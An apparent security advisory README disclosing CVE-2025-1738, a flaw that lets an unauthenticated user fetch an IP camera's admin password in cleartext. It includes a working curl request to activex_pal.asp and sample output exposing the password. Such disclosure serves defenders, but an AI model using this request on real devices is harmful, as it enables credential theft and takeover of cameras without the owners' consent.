
0day discover CVE-2025-1738
Following responsible disclosure, two official CVEs were assigned.
| CVE | CVSS v3.1 | Score | CWE | Type |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | Cleartext Password Exposure |
Any local user can retrieve the admin password in plaintext without needing prior authentication.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
The admin password is returned in cleartext within the response body.
activex_pal.asp and mblogin.asp.This repository is for educational and authorized security research only. The authors are not responsible for any misuse. Always obtain explicit permission before testing any device.